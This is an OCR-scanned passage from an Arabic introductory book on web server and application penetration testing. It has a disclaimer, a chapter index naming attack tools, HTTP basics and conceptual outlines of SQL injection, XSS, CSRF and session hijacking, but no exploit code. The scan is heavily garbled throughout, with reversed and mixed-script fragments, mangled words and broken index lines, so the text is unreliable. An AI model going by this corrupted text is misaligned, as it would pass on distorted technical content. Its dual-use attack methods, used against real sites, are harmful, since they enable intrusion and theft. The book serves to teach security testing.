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دليل عملي لطرق البحث عن الثغرات واستغلالها في سيرفرات 
وتطبيقات الويب. 


TTT 


جمیل حندنان: طوبل ل4 ٌ2 “Kal‏ 


اختبار اختراق 
سيرفرات وتطبيقات الويب 


سوریا - دمشق 


1/۲ ۲ 


Give a man an audit and he will be 
secure for a day. 


Teach a man to audit and he will be 
secure for the rest of his life. 


اختبار اختراق سيرفرات وتطبيقات الويب 


حول هذا الكتاب: 


هذا الكتاب مصمم ليعلمك طريقة اختبار اختراق الويب من الصفر, 


في هذا الكتاب أنا افترض أنك لا تملك معرفة سابقة حول اختبار اختراق 
الويب ولكنك تملك معرفة بسيطة حول بعض الأدوات المستخدمة 
وتملك معرفة بأنظمة التشغيل وأساسيات الشبكات و لا تملك تصور 
كامل كيف تتم عملية الاختراق. 


الهاكرز المحترفون هم مبرمجون محترفون وهم خبراء في التشفير 
وقواعد البيانات وطرق استخراج البيانات وآلية انتقال البيانات عبر الشبكة 
وأمور أخرى. 

إذا كنت لا تملك هذه المهارات لا تكن محبط هذه المعرفة وهذه 
المهارات يمكن الحصول عليها بالعمل والقراءة المستمرةء هذا الكتاب 
سيعلمك الأمور النظرية والعملية والأدوات والتقنيات الخاصة بمعظم 
طرق الهجوم ضد تطبيقات الويب المعاصرة ولن تحصل فقط على 
المعرفة والمهارات اللازمة بل ستحصل على الثقة للانتقال إلى طرق 
اختبار اختراق الويب المعقدة في المستقبل. 

إذا كنت مدير موقع أو مبرمج مواقع وتريد حماية موقعك أو كنت 
مهندس حماية أو كنت مهتم باختبار اختراق المواقع فهذا الكتاب هو 
لك. 
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إخلاء المسؤولية: 
الهدف من هذا الكتاب هو الحماية 


محتوی الكتاب هو شرح لطرق اختبار اختراق سيرفرات و تطبيقات 
ومستخدمي الويب لتتمكن من حماية موقعك من خلال فهم الطريقة 
المستخدمة في الهجوم. 

لا تستخدم هذه الأدوات وهذه التقنيات المشروحة في هذا الكتاب في 
عمل غير أخلاقي أو غير قانوني. 

لا تقم باختراق موقع دون حصولك على أذن من صاحب هذا الموقع. 
العديد من الأدوات المشروحة في هذا الكتاب من السهل كشفها 
وتتبعها, إذا قمت بعمل غير قانوني فإنك سوف تقاضى وتقاد إلى 
السجن 

الكاتب يخلى مسؤوليته عن أي استخدام غير قانوني لمحتوى هذا 
الكتاب. 


اختبار اختراق سيرفرات وتطبيقات الويب 


عن الكاتب: 
جمیل حسین طویله 
مھندس اتصالات من سوریا 


مختص بأمن المعلومات واختبار الاختراق. 


Email: 
dolphin-syria@hotmail. com 


cyber.sy@yandex.com 


fb: 
www.facebook.com/profile.php?id=10000555445689 7 


Blog: 
www.arabcyberwarrior.wordpress.com 


الإهداء: 
إلى روح أبي وأمي. 


إلى أرواح شهداء وطني سوريا 


اختبار اختراق سيرفرات وتطبيقات الويب 


محتویى هذا الكتاب: 

الفصل الأول: أساسيات اختبار اختراق الويب. 

الفصل الثاني: استطلاع سيرفر الويب. 

الفصل الثالث: البحث عن الثغرات واستغفلال سيرفر الويب. 
الفصل الرابع: استطلاع وفحص تطبيق الويب. 

الفصل الخامس: ثغرات الحقن. 

الفصل السادس: كسر المصادقة وتجاوز المسار. 


الفصل السابع: مهاجمة مستخدم الويب. 
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الفهرس: 


الفصل الأول: أساسيات اختبار اختراق الويب. 


ما الذي يجب أن تعرفه عن سيرفر الويب yy‏ 
ما الذي یجب أن تعرفه عن برتوکول ۳۲۲۴ E‏ 
أساسيات اختبار اختراق الويب O‏ ا 


ثغرات الويب الأكثر شيوعاً O‏ 


إعداد بيئة اختبار الاختراق a O‏ 


تطبيق الويب الهدف O‏ 
الفصل الثانى: استطلاع سيرفر الويب. 
مصادر الاستخبارات المفتوحة o‏ 


استطلاع 0۸S‏ ورسم المسار إلى الهدف O‏ 


الحصول على معلومات المستخدم O‏ 
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E O Google Hacking 
الاستطلاع الفعال والبحث عن التغرات ا‎ 
O ys NMAP 
E استراتجيات البحث السري‎ 
O N تعريف البنية التحتية للشبكة‎ 
a Shoden 
O نعداد الأجهزة‎ 
E Maltego 


الفصل الثالث: البحث عن الثغرات واستغلال سيرفر الويب. 


O O Nessus 
E CVE 
O O Nikto 
a OSVDB 
DL EE Metasploit 
O المحافظة على الوصول‎ 
E o Webacoo 
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الفصل الرابع: استطلاع وفحص تطبيق الويب. 


N مقدمة‎ 
O استطلاع واکتشاف تطبیق الویب‎ 
Ty أساسيات بروکسي الويب‎ 
E Brup Suite 
| أنواع الثغرات‎ 
|b OWASP - ZEP 
a OEE Acunetix 


الفصل الخامس: ثغرات الحقن. 


E O SQL Injection ٽlرغت‎ 
EE EEE SQL Injection öةرغت ایجاد‎ 
i O نجاوز المصادقة‎ 
E حصد هاشات كلمات السر‎ 
DDC O O EO O sqlmap 
O تغرات حقن تعليمات نظام التشغيل‎ 
E Web Shell 
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الفصل السادس: كسر المصادقة وتجاوز المسار. 


تغرات المصادقة وتجاوز الجلساة a‏ 
هجوم القوة الغاشمة O‏ 
E Brup Intruder‏ 
مهاجمة الجلسة E O‏ 
هجوم تجاوز المسار e Og oo‏ 


الفصل السابع: مهاجمة مستخدم الويب. 


E Cross Site Scripting (XSS) öj tî 
1 E Cross Site Request Forgery (CSRF) öj 
O تغرات الهندسة الاجتماعية التقنية‎ 
a استطلاع مستخدم الويب‎ 
e استغلال مستخدم الويب‎ 
A O Socia; Engineering Toolkit 
O O Phishing ديصنلl‎ 
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مقدمة: 


معظم الشركات والحكومات والمنظمات أصبحت الآن تعرض أنظمتها 
ومعلوماتها للعالم من خلال تطبيقات الويب, من السهل خلق تطبيقات 
ويب بدون أي معرفة عن الحماية, مع التقنية التي وصانا إليها اليوم 
أصبحت تطبيقات الويب أكثر تعقيداً من ذي قبل وتطور التكنلوجيا أوجد 
تقنيات وطرق اختراق جديدة. 

في الفترة الماضية أصبح بإمكانك الوصول إلى العديد من المنظمات 
المشهورة من خلال تطبيقات ومواقع الويب الخاصة بها. 

حماية تطبيقات الويب أصبد ذو أهمية كبيرة اليوم. 

إذا كنت تريد تعلم اختبار اختراق تطبيقات الويب فهذا الكتاب سيكون 
البداية لك على افتراض أنك لا تملك أي معرفة سابقة بطرق وتقنيات 
اختبار اختراق الويب. 

من خلال هذا الكتاب سوف تتعلم التقنيات والأدوات الأساسية التى 
تحتاجها لإيجاد واستغلال التغرات في تطبيقات الويب. 

كلنا نعتمد على تطبيقات الويب للقيام بالعديد من مهامنا اليومية إها 


في العمل أو في المنزل ونقوم بالدخول لهذه التطبيقات أكثر من مرة 


يومياً من خلال جهاز الحاسب أو من جهاز الهاتف ونستخدم هذه 
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التطبيقات من أجل التسوق أو دفع الفواتير أو حضور الاجتماعات بشكل 
ineاon‏ أو للتواصل مع الأصدقاء والعائلة من خلال مواقع التواصل 
الاجتماعي والعديد من المهام الأخرى. 


من خلال هذا الكتاب سوف تتعرف على الأساسيات بشكل نظري ثم 
تتعرف على الأدوات والتقنيات المستخدمة في كشف الثغرات 


هذا يعني أنك ستصبح قادر على جعل تطبيقات الويب تقوم بأعمال لم 
تكن فعدة للقيام بها مثل كشف المعلومات الحساسة من قاعدة 
البيانات وتجاوز صفحة تسجيل الدخول وسوف تتعلم كيفية اختيار 
الهدف وكيفية القيام بالهجوم لتصبح قادر على حماية نفسك ضد هذا 
النوع من الهجمات. 


اختبار اختراق سيرفرات وتطبيقات الويب 


سیرفرات الویب وبرتوکول 1۲۲۲۴. 
١‏ أساسيات اختراق الويب. 


ثفرات الويب الشائعة. 


« إعداد بيئة اختبار آمنة لكي لا يتم اقتيادك إلى السجن. 


/am a hacker and this is my manifesto: 
" peace, right and justice " 


You can't stop me 


اختبار اختراق سيرفرات وتطبيقات الويب 


مقدمة: 
اختبار اختراق الشبكات ليس موضوع هذا الكتاب ولكن هناك أدوات 


وتقنيات معينة يجب على كل شخص مهتم بالحماية أن يعرف كيفية 


استخدمها. 


سيرفر الويب هو الجهاز الذي يستضيف تطبيق الويب . اختبار اختراق 
الشبكة يمكن أن يتم باستخدام بعض الأدوات مJû Nmap, Nesses and‏ 
Metasploit‏ 

يجب عليك أولاً أن تكون خبيراً في استخدام هذه الأدوات أو أى أدوات 


على مبداً تعلم المشي قبل أن تتعلم الركض. 

هناك العديد من الكتب والمصادر التي تستطيع من خلالها تعلم كيفية 
استخدام هذه الأدوات ولكن سيكون هناك بعض الأمور التي ستختلف 
قليلاً عند استخدام هذه الأدوات لاستهداف سيرفر الويب. 

اختبار اختراق الشبكات يتم بإتباع منهجية مرتبة وهذا الكتاب مبنى على 
هذه المنهجية, سوف نقوم بعملية استطلاع الهدف ثم البحث عن 
البورتات المفتوحة ثم البحث عن الثغرات ثم القيام بعملية الاستفلال 
ومن ثم تتبيت الاستغلال وذلك خلال مهاجمة سيرفر الويب. 
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هناك العديد من الأمور يجب أن تدركها قبل البدء باستخدام الأدوات 
الخاصة باستغلال تطبيقات الويب. 


هذا الفصل يغطي کل المعلومات التي تحتاجها قبل البدء باستخدام 
أدوات وتقنيات اختبار اختراق الويب. 


لتملك قاعدة قوية أنت بحاجة إلى عدة سنوات من ممارسة اختبار 
الاختراق ولكن هناك أساسيات جوهرية يجب أن تفهمها بشكل جيد, 
هذه الأساسيات تتضمن الثغرات الشائعة ومن المهم أيضاً أن تفهم 
الوقت والزمان المناسبين لاستخدام الأدوات وهذا ما ستتعلمه من خلال 
هذا الفصل. 

هذا الفصل يتضمن شرح خطوة بخطوة لتجهيز البيئة المناسبة والآمنة 
للقيام بتجارب اختبار اختراق الويب. 


تقنيات الحماية تتطور بشكل مستمر متل الجدران النارية ااحمwء”٣ا؟‏ 
وأنظمة كشف ومنع التطفل ولكن هذه الأجهزة تقدم القليل فقط من 
أجل حماية تطبيقات الويب والبيانات الموجودة داخل تطبيقات الويب 
لذلك فإن الهاكرز انتقلوا إلى مهاجمة تطبيقات الويب التي تقوم 
بالتفاعل بشکل مباشر مع الأنظمة الداخلية مثل سيرفرات قواعد البيانات 
التي لا تكون محمية بجدران نارية وأجهزة حماية الشبكات الأخرى. 
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في السنوات القليلة الماضية تم التأكيد على وضع برامج حماية وأصبحت 
تطبيقات الويب الحديثة أكثر حماية من التطبيقات ذات الاصدارات 
القديمة. 

لأن تطبيقات الويب أصبحت أكثر حماية فقد أصبح توجه الهاكرز نحو 
هناك القليل من مدراء الشبكات ومبرمجين الويب قادرين على حماية 
مستخدمي الويب ضد هجمات الهندسة الاجتماعية التي تستهدف 


تخيل فرحة المهاجم عندما يتمكن من تنفيذ هجوم باستخدام طرق غير 
تقنية دون القلق حول نظام كشف التطفل أو الجدران النارية. 


في هذا الكتاب سوف تتعلم كيفية الهجوم على سيرفر الويب وعلى 
تطبيقات الويب وعلى مستخدمي الويب وستصبح قادر على فهم آلية 
هذه الأنواع المختلفة وما هى الأدوات التي تحتاجها للقيام بهذه 
المهمة. 
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ماهي تطبيقات الويب: 


مصطلح تطبيق ويب ١٥نأةءiاممج‏ امس له معاني مختلفة بالاعتماد على 
oe 1|‏ ° الذي de20 li‏ 


العديد من الناس يطلقون مصطلحات تطبيق ويب أو موقع ويب أو نظام 
يعتمد على الويب أو سوفت وير يعتمد على الويب أو فقط كلمة ویب 


وكلها تملك نفس المعنى. 


المصطلح "تطبيق ويب" سيستخدم في هذا الكتاب للإشارة إلى أي 
سوفت وير مبني بالاعتماد على الويب ليؤدي وظيفة تعتمد على 
التفاعل مع المستخدم. 


عندما يتفاعل المستخدم مع موقع الويب ليقوم بمهمة مثل تسجيل 


الدخول أو التسوق أو إدارة الحساب البنكي أو التفاعل من خلال مواقع 
التواصل الاجتماعي هذا يسمى تطبيق ويب. 
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ما الذي يجب أن تعرفه عن سيرفر الويب: 


سیرفر الویب هو سوفت وبر ٤2۴سااهء‏ يعمل داخل نظام تشغيل 
السيرفر ٣٠۷إهء‏ والذي يسمح للاتصال بالوصول إلى تطبيق الويب. 
أكثر سيرفرات الويب انتشاراً هي: 

!nformation Services (lS) "‏ ternetہا:‏ الذي یعمل علی نظام 

ويندوز. 

server »‏ acheمAp:‏ والذی يعمل علی آنظمة لینکس. 
هذه السيرفرات تملك بنية مجلدات عادية مثل أ جهاز کمبیوتر وھهذه 
المجلدات تكون داخل تطبيق الويب. 
إذا اتبعت خطوات تنصيب ٣ء۷٣ءء‏ اعمس |١8‏ ستصل بالنهاية إلى بنية 


المجلد الافتراضی w W٥٥٤‏ اط uمnet‏ حیث کل تطبیق سیملك 
مجلدہ الخاص داخل اooاwWwWWw‏ 


دن ا تلف في بنية الملفات ولكن معظم تطبيقات 
الویب تکون داخل WW‏ N/٣aر/‏ 

هناك العديد من المجلدات في ١‏ ع۷٣‏ مء امس Linux‏ مرتبطة باختبار 
اختراق الويب مثلاً المجلد سهله۸ء/ءاه/ يحوي على الهاش الخاص 
بكلمة السر لكل مستخدم للنظام والمجلد طناامءئن/ يحوي على ملفات 
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غير معدة لتكون ملفات تنفيذية من قبل المستخدم أو من قبل اامطء 
٤مiاعء‏ وتستخدم من قبل التطبيق وتكون داخل هذا المجلد 

/٣/‏ هذا المجلد يحوي على الملفات الخاصة بقاعدة البيانات وسجلات 
النظام والكود المصدر لتطبيق الويب نفسه. 

٣ط/‏ هذا المجلد يحوي على البرامج التي يحتاجها النظام ليعمل مثل 
grep‏ ,ا ,اامsh‏ وبرامج مساعدة أخری. 

مط هي اختصار إلى رادہاط معظم تعليمات نظام التشغيل تكون هنا 
على شكل ملفات منفصاة. 


سيرفر الويب هو هدف للمهاجم لأنه يحوي على منافذ امم مفتوحة 
وثغرات بالإضافة إلى إخطاء في إعدادات نظام التشغيل أو وجود 


الإعدادات الافتراضية كما هى. 


ما الذی یجب أن تعرفه عن :H۲٣۲۲‏ 
HTTP (Hypertext transfer protocol)‏ 


هو بروتوكول (عمليات متفق عليها) يستخدم للتفاعل والاتصال مع 
تطبيق الويب. 


ليس هناك أي اعتبار للحماية أو الخصوصية عند استخدام 1۲۳۴ 
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وهو يعتبر برتوكول مشرد آي مستخدم يطلب وتطبيق الويب يجيب 
بشكل مستقل ودون أي معرفة بأي طلبات سابقة ولكن تطبيق الويب 
يحفظ مسار طلب المستخدم لذلك تستطيع إتمام إجراءات مثل التسوق 
بشكل اون لاين ١"٣iامه‏ (عندما تقوم بإضافة مشترياتك إلى بطاقتك 
واختيار طريقة التوصيل و إدخال معلومات الدفع). 

8۶ بدون استخدام الكوكيز sمi)ممهء‏ يمكن أن يطلب منك إعادة 


تسجيل الدخول خلال كل خطوة أو كل عمل تقوم به وهذا أمر غير عملي 
لذلك تم إيجاد مفهوم الجلسة ١هاوومء‏ حيث يقوم التطبيق بحفظ مسار 


طلباتك بعد قيامك بعملية تسجيل الدخول, وهي تؤمن عامل أخر يكون 
عرضة للهجوم في تطبيق الوبب. 

يمكنك رؤية التفاصيل عن كيفية عمل ۳۲۳۲۳۴ باستخدام أداة تحليل 
برتوکولات .wireshark Jin‏ 

استخدام (۳۸1۲۲۴۶) eure H۴‏ يمنع بعض أنواع الهجمات التي 
یتم الحصول علی ۸1۲۲۴۶۹ عندما یستخدم ۸1۲۲۴ برتوکول )8S8L/۲L8(‏ 


Secure Socket Layer/Transport Layer Security 
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والذي يضيف 8551/١۳1١‏ إلى طلب وإجابة ۳۳۳۴ العادية وهي أفضل 
طريقة لإفشال هجوم رجل في المنتصف وهي تؤمن اتصال خاص 
ومحمي بين متصفحك وتطبيق الويب. 

استخدام ۳۲۳۲۴۶ يعني الاتصال مع تطبيق الويب عبر قناة اتصال 


1 هة‎ . oe 


:Cycles HTTP 
دورة أو حلقة مام (الطلب اوuوما من متصفح المستخدم والاجابة‎ 
العائدة من سیرفر الویب).‎ response 


المتصفح يرسل طلب يحوي على بارامترات (متغيرات) خاصة بدخل 
المستخدم وسيرفر الويب يرسل إجابة يتم توجيهها إلى مصدر الطلب. 


تطبيق الويب يمكن أن يعمل بالاعتماد على قيمة البارامترات لذلك فهى 
أول هدف يقوم مختبر الاختراق بمهاجمته وذلك باستخدام قيم خبيثة 


للبارامترات لاستعلال تطبيق الويب وسيرفر الويب. 


:HTTP Header ةwıgرi‎ 


کل دورة مار ۳۲۲۴ تتضمن ترويسات في كل من طلب المستخدم 


وإجابة السيرفر والتي تحوي تفاصيل حول الطلب والإجابة. 
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هناك العديد من هذه الترويسات ولكننا سنهتم فقط ببعض الأنواع في 
هذا الكتاب. 


الترويسات التي سنهتم بها هي التي يتم إعدادها في سيرفر الويب 
وإرسالها إلى متصفح المستخدم كجزء من دورة الإجابة وهي: 
:Set-Cookie‏ هذه الترويسة تؤمن فعرف للجلسة للمستخدم 
للتأكيد أن جلسة المستخدم مازالت مستمرة. 
إذا تمكن المهاجم من سرقة الجلسة (من خلال هجوم سوف يتم 
شرحه في فصل لاحق) فيمكن استغلال واختراق المستخدم داخل 
:Content-Lkength‏ قيمة هذه الترويسة هي طول جسم الإجابة 
بالبايت, هذه الترويسة مفيدة لمهاجم لأنها تساعده على فك 
تشفير إجابة التطبيق وهي قابلة للتطبيق في هجوم القوة 
dllژlشۉoة .brute force‏ 
:Lk0cation‏ هذه الترويسة تستخدم عندما يقوم التطبيق بإعادة 
توجيه المستخدم إلى صفحة جديدة. 
وهي مفيدة للمهاجم لأنه يمكن أن يستخدمها لتعريف الصفحات 
المسموحة فقط بعد نجاح عملية المصادقة. 
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الترويسات التي ترسل من متصفح المستخدم هي: 
:Cookie "‏ ھذہ الترویست ترسل kieەہe‏ او اکثر من ie)مہe‏ إلی 
السيرفر للحفاظ على جلسة المستخدم. 
قيمة ترويسة الكوكيز دائماً تكون مطابقة ãlيão Set-cookie‏ 
header‏ التي يعلن عنها السيرفر. 
هذه الترويسة مفيدة للمهاجم لأنها تؤمن جلسة شرعية مع 
تطبيق الويب والتي يمكن أن تستخدم للهجوم ضد مستخدمين 


:Referrer "‏ هذه الترويسة تعرض قائمة بصفحات الويب التي زارها 
المستخدم سابقاً عندما يتم تشكيل طلب الويب التالي. 
وهي مفيدة للمهاجم لأن هذه القيمة يمكن تغييرها بسهولة 
وبالتالي إذا اعتمد التطبيق على هذه الترويسة من أجل الحماية 
فيمكن بسهولة تخطي الحماية باستخدام قيمة مزورة. 


:HTTP Status Codes 
بما أن متصفحك يستقبل رد السيرفرء فهو يتضمن كود الحالة للإشارة‎ 
وهي مجمعة في‎ ۳١١۴ إلى نوع الإجابة, هناك أكثر من 50 كود إجابة‎ 


خمس عائلات. 
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معرفة أى نوع عائلة الإجابة يسمح لك بفهم كيف يتم معالجة مدخلاتك 
من قبل التطبيق. 


٠‏ 100: هذه الإجابات هي إعلام من قبل سيرفر الويب وعادتاً تعني 
أن هناك إجابة إضافية قادمة من سيرفر الويب. 
نادراً ما نراها في إجابات سيرفر الويب الحديث وعادتاً تتبع بعد نوع 
أخر من الإجابة. 

" 200: هذه الإجابات هي إشارة أن طلب المستخدم تم استقباله 
ومعالجته من قبل سيرفر الويب بنجاح والإجابة سيتم إرسالها إلى 
أشھر كود OK 200 ga HTTP J alla‏ 


٠‏ 300: هذه الإجابات تستخدم للإشارة لإعادة التوجيه عندما يتم 
إرسال إجابات إضافية إلى المستخدم. 
التطبيق الأكثر شيوعاً لهذا الكود هو لإعادة توجيه متصفد 
المستخدم إلى الصفحة الرئيسية بعد نجاح عملية المصادقة مع 
تطبيق الویب. 


Redirect 302‏ وترسل إجابة اخری یتم استلامها مع 200 0۸ 


٠‏ 400: هذه الإجابات تستخدم للإشارة للخطاً في الطلب من قبل 
المستخدم. 
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هذا يعني أن المستخدم قام بإرسال طلب لا يمكن معالجته من 
قبل تطبيق الويب, أشهر أكواد الحالة في هذا العائلة هى 
Unauthorized, 403 Forbidden, 404 Not Found 401‏ 

500: هذه الإجابات تستخدم للاشارة لخطاً من جانب السيرفر. 
أشهر أكواد الحالة في هذه العائاة 


Internal Server Error and 503 Service Unavailable 500 
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اساسيات اختبار اختراق الويب: 
عملية اختبار الاختراق مقسمة إلى أربع مراحل: 
Reconnaissance gllhiwlll -\‏ 
۲- البحث عن اlلûغرlۈٽت Scanning‏ 


Exploitation Jlleiwlll -T 
Maintain access Jgصngلll تتبيت الاستغلال والمحافظة على‎ -“ 


الهدف: 


سيرفر الويب, وتطبيق الويب, ومستخدم الويب. 
سنعرف هذه الأهداف كالتالي: 

-١‏ سيرفر الويب: هو التطبيق الذي يعمل على نظام التشغيل 
الذي يستضيف تطبيق الویب, وهو لیس جهاز كمبیوتر 
بمواصفات عادية وهو يؤمن خدمات تعمل مع منافذ ports‏ 
مفتوحة تسمح لتطبيق الويب بالاتصال مع متصفح المستخدم. 
سيرفر الويب يمكن أن يحوي على ثغرات و مختبر الاختراق يحاول 
مهاجمة الخدمات التي تعمل على السيرفر للحصول على دخول 
غير مصرح به لملفات سيرفر الويب وملفات النظام. 
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-١‏ تطبيق الويب: فعلياً هو الكود المصدري الذى يعمل على 
سيرفر الويب وهو يؤمن عملية التفاعل مع مستخدم الويب. 


وهو الهدف الأكثر استهداف من قبل مختبر الاختراق. 


-١‏ مستخدم الويب: المستخدم الداخلي هو الذي يقوم بإدارة 
تطبيق الويب (المدير أو المبرمج) و المستخدم الخارجي (الزبون 
أو الزائر) 
كلا المستخدمين هما عرضة للهجوم من خلال تغرات 
cross-site scripting (XSS)‏ 
cross-site request forgery (CSRF)‏ 


أو من خلال هجمات الهندسة الاجتماعية. 
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الأدوات: 


لكل أداة نستخدمها في هذا الكتاب هناك على الأقل خمس أدوات 
أخرى يمكن أن تقوم بنفس العمل ومعظم هذه الأدوات موجودة مسبقاً 
بنظام كالي لينكکس. 
بعض الذدوات التي سنستخدمها هي: 
Suite "‏ مBurp:‏ وهي أداة ضرورية في أي عملية اختبار اختراق 
للويب. 
laislg Burp Suite ayi :Zwd Attack Proxy(ZAP) "‏ تحوي على 
باحث مجاني عن الثفرات قابل العمل على تطبيقات الويب. 
" مNNmapP:‏ لمسح البورتات 
:N Nessus and NiktO0‏ للبحث عن التغرات 
اoitاMetasp:‏ لاستغلال سیرفر الویب. 
" مmaاوS:‏ من أجل الحقن في توعد lıJlنlت SQL injection‏ 
Engineering Toolkit (SET) *"‏ اSocia‏ للقیام بهجوم هندسة 
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ثغرات الويب الأكثر شيوعاً: 


الحقن n٣٥ن†‌مزما:‏ الحقن یحدث عندما یقوم مستخدم غير موثوق به 
بإرسال بيانات إلى تطبيق الويب كجزء من تعليمة أو طلب. 
بيانات مختبر الاختراق الخبيثة يمكن أن تخدع تطبيق الويب ليقوم بتنفيذ 
تعليمات غير مرغوبة أو للوصول الغير مسموح به للبيانات. 
الحقن يحدث عندما يقوم مختبر الاختراق بإرسال دخل مخادع إلى تطبيق 
الويب والذي يقوم بعدها بعملية غير آمنة. هذا النوع هو أقدم أنواع 
الهجمات ضد تطبيقات الويب ولكنه مازال متربع على عرش الثغرات لأنه 
ثغرات الحقن يمكن أن تظهر في كل مكان داخل تطبيق الويب. 
بعض أنواع هجمات الحقن الأكثر شيوعاً هي: 

Structured query language (SQL) queries " 

Lightweight directory access protocol (LDAP) queries " 


XML path language (XPATH) queries " 
Operating system (OS) commands " 


عملية الحقن يمكن أن تحدث عندما يكون دخل المستخدم مقبول دائماً 
من قبل تطبيق الويب وعملية المعالجة تتم بدون تنقيح صحيح. 
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هذا يعني أن مختبر الاختراق يستطيع أن يؤثر ويسيطر على طلبات 
تطبيق الويب وبنية التعليمات والبيانات التي يجب أن تكون موجودة في 


نتيجة هذه الطلبات وهذا يعتبر استغلال قوي جداً. 


:Cross-site Scripting (XSS) 
تحدث عندما يكون دخل المستخدم مقبول من التطبيق كجزء من الطلب‎ 
ثم يستخدم في خرح الإجابة بدون ترميز صحيح للخرج و في مكان ساري‎ 

المفعول وصحيح. 

5 تسمح لمختبر الاختراق بتنفيذ سكريبت أما٣ءء‏ داخل متصفح 
المستخدم وهذا يسمح له بسرقة جلسة المستخدم ويمكن أن يقوم 
بتنصيب (۲مووه‌اره») أو إعادة توجيه المستخدم إلى مواقع خبيثة أو 


إلى آي شيء أخر يريده مختبر الاختراق. 


مختبر الاختراق یستطیع حقن سکریبت خبیث (غالباً ما يكون ام ۷2ول 
أو يمكن أن يكون أمذاء۷8S‏ و يسلمه إلى متصفح الهدف, ولأن هذا 
السكريبت هو جزء من إجابة التطبيق فإن متصفح الهدف يثق به 
ويسمح للسكريبت بالعمل. 
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65 لها نوعين المنعكس والمنخjj :reflected and stored‏ 
ectedاefا :XSS‏ هو أكثر انتشاراً في تطبيقات الويب ويعتبر الأقل ضرر, 
سبب اعتباره أنه هو الأقل ضرراً ليس بسبب ما الذي يستطيع عمله 


ولكن عند يتم إرسال كھهاردم في هجوم 55× ecte4اref‏ فإنه يكون 
شرعي وفعال لطب واحد فقط. 


وأي مستخدم يضغط على الرابط الذي يحوي السكريبت الخبيث سيكون 
الشخص الوحيد المتأثر أو المصاب مباشرة بهذا الهجوم. 


بشكل عام له معدل 1:1 hacker to victim‏ 


مختبر الاختراق يمكن أن يرسل نفس عنوان الرابط ا8ل الخبيث إلى 
ملايين من الضحايا ولكن فقط الشخص الذي سيضغط على الرابط هو 
الذي سوف پتأثر. 

XSS‏ redاSto:‏ من الصعب ايجاده في تطبيقات الويب ولكن ضرره كبير 
جداً ولأنه يستمر عبر أكثر من طلب ويمكن أن يستغل عدد من 
المستخدمين في هجوم واحد. و يحدث عندما يكون المهاجم قادر على 
حقن السكريبت الخبيث في التطبيق ويكون السكريبت متاح لكل 
المستخدمين الزائرين ويمكن أن يكون في قاعدة البيانات التي تستخدم 
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من قبل صفحة الويب أو في المنتدى الذي يعرض الرسائل للمستخدم أو 


في أي تقنية تقوم بتخزين الدخل. 


المستخدمون الشرعيون يطلبون الصفحة و عندها فإن الاستغلال SS؟S×‏ 
oitامx×ه‏ سوف يعمل في کل متصحفات المستخدمین. 


many hacker to victim:1 Jeo alg 


كلا النوعين من 58× لهما نفس 4هه الةم ولكن يتم تسليمها بطرق 


كسر المصادقة وإدارة الجلسسة: 


الجلسة هى فعرف فريد يخصص للمستخدم بعد عملية المصادقة 
وتحوي على العديد من الثغرات المرتبطة بكيفية استخدام هذا القعرف 
من قبل تطبيق الويب. 


الجلسة هي المفتاح لاختراق مستخدم الويب. 


وظائف التطبيق المتعلقة بالمصادقة وإدارة الجلسة غالباً لا تتم بشكل 


صحيح وهذا يسمح لمختبر الاختراق بالوصول إلى كلمات السر و ١0أئومs‏ 
token‏ الخاصة بالجلسة 
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ال اظن الف هة المذادةة تكم فة كاف الس وة 
تعينها واستعادة الحساب. 

تطبيق الويب يستخدم إدارة الجلسة للحفاظ على مسار طلبات كل 
مستخدم, وبدون إدارة الجلسة فإنك ستضطر إلى تسجيل الدخول بعد 
كل طلب تقوم به. لذلك تم إيجاد إدارة الجلسة وبالتالي المستخدم يجب 


عليه تسجيل الدخول مرة واحدة عند زيارة تطبيق الويب. 


:CSRF (Cross-site Request Forgery) 
تحدث عندما يكون لمختبر الاختراق القدرة على إرسال طلب يقوم هو‎ 
بصناعته لأغراض خبيثة إلى مستخدم قصادق مع التطبيق وهو يحوي‎ 

على بارامترات ضرورية لإكمال طلب شرعي للتطبيق بدون أن يدرك 
المستخدم الهدف ذلك. 


هذا شبيه ب 88× 4ءاءءا؟ه٣‏ و التي فيها يجب على مختبر الاختراق أن 
يجبر الهدف على تأدية عمل في تطبيق الويب (الضغط على رابط) 
السكريبت الخبيث يمكن أن يستمر في العمل في متصفح الهدف ولكن 
في S8۴‏ يمكن أيضاً أن يؤدى إلى صناعة طلب شرعي لتطبيق الويب. 
بعض نتائح تزوير الطلبات هي تغيير كلمة السر أو خلق مستخدم جديد 
أو خلق محتوى ويب جديد, طالما أن مختبر الاختراق يعرف بالضبط ماهى 
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البارامترات الضرورية لإكمال الطلب وأن الهدف قصادق مع التطبيق, 
فإن الطلب سيتنفذ كما لو أنه تم بمعرفة المستخدم الهدف. 


الاعداد الخاطيى للحماية: 


هذه التغرة تصنف بشكل خاص للتعامل مع الحماية (الضعف في 
الحماية) في كامل حزمة التطبيق, وهي متعلقة بنظام التشغيل 
وسيرفر الويب ونظام إدارة قاعدة البيانات, هذه المخاطر تصبح آأکثر 
صعوبة عندما لا تؤمن الحماية منع الوصول الغير مسموح به التطبيق. 


أمثلة على هذه الثغرة التي يمكن أن تكون في سيرفر الويب: 


البرامج الغير ضرورية. 
« تفعيل الخدمات الغير ضرورية. 
سياسات الحساب الفغير محمية. 
رسائل الخطاً المفصاة. 


الحماية الفعالة تتطلب إعدادات محمية تعرف وتنفذ على التطبيق وعلى 
إطار العمل وعلى سيرفر التطبيق وعلى سيرفر الويب وعلى سيرفر 
قاعدة البيانات وعلى نظام التشغيل؛ كل هذه الإعدادات يجب أن عرف 
وتنفذ بدل من إعدادات الحماية الافتراضية, وهذا يتضمن كل البرامج 
التي تتعامل مع البيانات ومكتبات الكود الذي يستخدمه التطبيق. 
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إعداد بيئة اختبار الاختراق: 


قبل البدء بالعمل مع الأدوات والتقنيات المشروحة في هذا الكتاب من 
المهم أن تقوم بإعداد بيئة آمنة لأننا في هذا الكتاب سوف نقوم 
بتطبيق عملي لتغطية ثغرات الويب وهناك العديد من الأسباب التي 


يجب أن تؤخذ بعين الاعتبار للقيام بإعداد بيئة الاختبار. 


-١‏ لأنك سوف تستضيف تطبيق الويب الذي يحوي على ثغرات على 
جهازك لذلك یجب آن تقوم بإعداده بشکل صحيح لكي لا یکون 
جهازك عرضة للمهاجمين. 

۲- سوف تستخدم أدوات اختبار اختراق غير مصرح باستخدامها لغیر 
الاستخدام الشخصي. 

۳- بالتأكيد سوف تقوم بإيقاف تطبيق الويب أو سيرفر الويب عن 
العمل خلال عملك في هذا الكتاب لذلك من المهم إعداد بيئة 
عمل تحوي على زر إعادة يسمح لك بالعودة لذي حالة يكون 
فيها کل شيء مضبوط بشکل صحيح. 

